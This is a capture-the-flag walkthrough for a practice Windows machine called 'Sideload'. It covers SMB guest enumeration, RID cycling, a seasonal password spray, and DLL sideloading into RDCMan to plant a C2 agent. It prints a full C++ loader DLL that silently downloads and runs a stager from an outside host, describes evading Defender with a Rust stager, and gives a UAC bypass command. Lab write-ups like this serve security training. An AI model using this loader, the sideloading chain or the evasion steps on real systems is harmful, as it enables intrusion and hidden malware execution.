Sideload
This box is provided by HackSmarter https://www.hacksmarter.org/
Overview
Sideload is a Windows-based machine focused on DLL sideloading as a lateral movement technique. The attack chain begins with unauthenticated SMB enumeration, where guest access to a file share reveals a pentest report exposing usernames and hints about weak passwords. A RID-cycle bruteforce enumerates local accounts, and a targeted password spray using seasonal/company-themed wordlist variants yields valid credentials for jade.moreno. With write access to the IT share, the attacker abuses RDCMan's predictable DLL search order to plant a malicious DWrite.dll - cloned and proxied using NetClone - which delivers an Adaptix C2 beacon as lewis.hopkins. Lewis turns out to be a local admin. Defender blocks unobfuscated agents, so a minimal loader DLL is used to download and execute a Rust-based stager. Finally, a UAC bypass via SSPI in AdaptixC2 elevates to a high-integrity session, completing the privilege escalation path.
Recon
Start with a standard Nmap service scan alongside a full port sweep to identify all listening services on the target.
sudo nmap -sC -sV -vv -oA tcp 10.1.197.204; sudo nmap -sC -sV -vv -p- -oA allports 10.1.197.204The scan reveals open SMB ports (445/139) among other services. SMB is an immediate target for unauthenticated enumeration.
Connect to the SMB service using impacket-smbclient with guest credentials (no password) to enumerate accessible shares without requiring valid domain credentials.
Guest access is permitted on the IT share, which is a common misconfiguration in internal environments. This share contains files left behind by IT staff that were not intended to be publicly readable.
Browsing the IT share uncovers a pentest report. This is a critical OPSEC failure on the target organization's part - storing a pentest report on a world-readable share leaks findings, usernames, and potentially password policies to an unauthenticated attacker.
The report reveals usernames (jade, lewis, darkairos) and context about the environment (the company name Sideload), all of which will be used to build a targeted password list.
Use netexec (nxc) to perform a RID cycle bruteforce over SMB. This technique queries the Security Account Manager (SAM) via null or guest session to enumerate local and domain accounts by iterating through Relative Identifiers (RIDs), which are the numeric suffixes of Windows Security Identifiers (SIDs).
nxc smb 10.1.197.204 -u 'guest' -p '' --ridThis produces a confirmed list of account names on the target, which is saved to a users file for use in the password spray.
Build a targeted password wordlist using context gathered from the pentest report - usernames, the company name, and common seasonal patterns. Organizations frequently use passwords following the format Season+Year.
potential_pass
Summer
Winter
Autumn
Spring
Sideload
Darkairos
jade
lewis
summer
winter
autumn
springThe following Python script generates all combinations of these base strings with years from 2020 to 2026, producing a compact but contextually relevant wordlist:
with open("potential_pass", "r") as f:
lines = f.read().split("\n")
for line in lines:
for y in range(2020,2027):
pa = f"{line}{y}"
print(pa)Spray the generated passwords against RDP using netexec. The --continue-on-success flag ensures the tool does not stop after the first hit, and --timeout 30 accommodates slower RDP response times.
nxc rdp 10.1.137.167 -u users -p ../exploit/pass_check --continue-on-success --timeout 30The spray returns a valid credential pair: jade.moreno:Winter2026. This confirms the organization is using predictable seasonal passwords, a finding that was presumably noted in the pentest report found on the share.
Foothold
Validate the jade.moreno credentials against SMB to confirm their scope. Rather than just RDP access, Jade now has authenticated access to shares.
Authenticated SMB access as jade.moreno reveals write permissions on the IT share. This is significant - write access to a share that other privileged users interact with creates an opportunity for file planting attacks, such as DLL sideloading.
Lateral Movement
With write access to the IT share, the next step is to identify how privileged users interact with files on that share. Process Monitor from Sysinternals is run on the target to observe process behavior - specifically, to capture DLL load attempts by applications running as higher-privileged users.
Process Monitor reveals that Remote Desktop Connection Manager (RDCMan) attempts to load DWrite.dll from its own application directory before falling back to C:\Windows\System32\. This is the classic DLL search order hijacking condition - if an attacker can place a malicious DWrite.dll in the directory RDCMan loads from (which happens to be on the writable IT share), any user launching RDCMan will execute the attacker's code.
Use NetClone to generate a proxy DLL. Rather than a bare malicious DLL (which would likely crash RDCMan and alert the user), NetClone creates a forwarding wrapper that proxies all legitimate DWrite.dll exports to the real system DLL while also executing the attacker's payload. The payload DLL (agent.x64.dll) is an Adaptix C2 agent.
.\NetClone.exe --target .\agent.x64.dll --reference C:\Windows\System32\DWrite.dll -o DWrite2.dllThe resulting DWrite2.dll is uploaded to the IT share path where RDCMan will load it. When lewis.hopkins (or another privileged user) opens RDCMan, the malicious DLL is loaded in their process context, executing the Adaptix agent and beaconing back to the C2 server.
The sideloaded DLL executes and a callback is received in Adaptix C2 as lewis.hopkins.
With a shell as Lewis, the user flag can now be retrieved.
Privilege Escalation
Checking Lewis's group memberships and privileges reveals that the account is a member of the local Administrators group.
However, Windows UAC (User Account Control) prevents a standard session from exercising admin privileges without elevation. Additionally, Windows Defender is active and repeatedly blocks attempts to run unobfuscated Adaptix agents directly, making it difficult to spawn an elevated session using standard payloads.
To work around Defender, a minimal C++ loader DLL is crafted. Its sole purpose is to use CreateProcessA to spawn a hidden cmd.exe that downloads a Rust-based stager (rr.exe) via PowerShell and executes it. The Rust loader is used because Defender has lower detection coverage for Rust-compiled binaries compared to common C++ or .NET agents.
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdlib.h>
#include <Windows.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
STARTUPINFOA si = { 0 };
PROCESS_INFORMATION pi = { 0 };
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
CreateProcessA(
NULL,
(LPSTR)"cmd.exe /c powershell -c wget http://10.200.47.86:8443/rr.exe -OutFile C:\\Windows\\Tasks\\rr.exe; Start-Process C:\\Windows\\Tasks\\rr.exe",
NULL,
NULL,
FALSE,
CREATE_NO_WINDOW,
NULL,
NULL,
&si,
&pi
);
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}The DLL is wrapped again with NetClone to produce a proxy DLL that forwards exports, preventing the target application from crashing when it loads it.
The proxy DLL is deployed via the same sideloading path. When executed, it downloads rr.exe to C:\Windows\Tasks\ (a writable directory that rarely triggers AV heuristics) and runs it. The Rust stager beacons back to Adaptix successfully, bypassing Defender.
With a stable beacon running as lewis.hopkins (local admin), the UAC bypass built into AdaptixC2 is used. The uacbypass sspi module abuses the SSPI (Security Support Provider Interface) to trigger a privileged process start without a UAC prompt:
uacbybass sspi "powershell -c Start-Process C:\\Windows\\Tasks\\rr.exe"This relaunches rr.exe in a high-integrity (elevated) context, resulting in a new Adaptix beacon with full administrative privileges. The machine is fully compromised.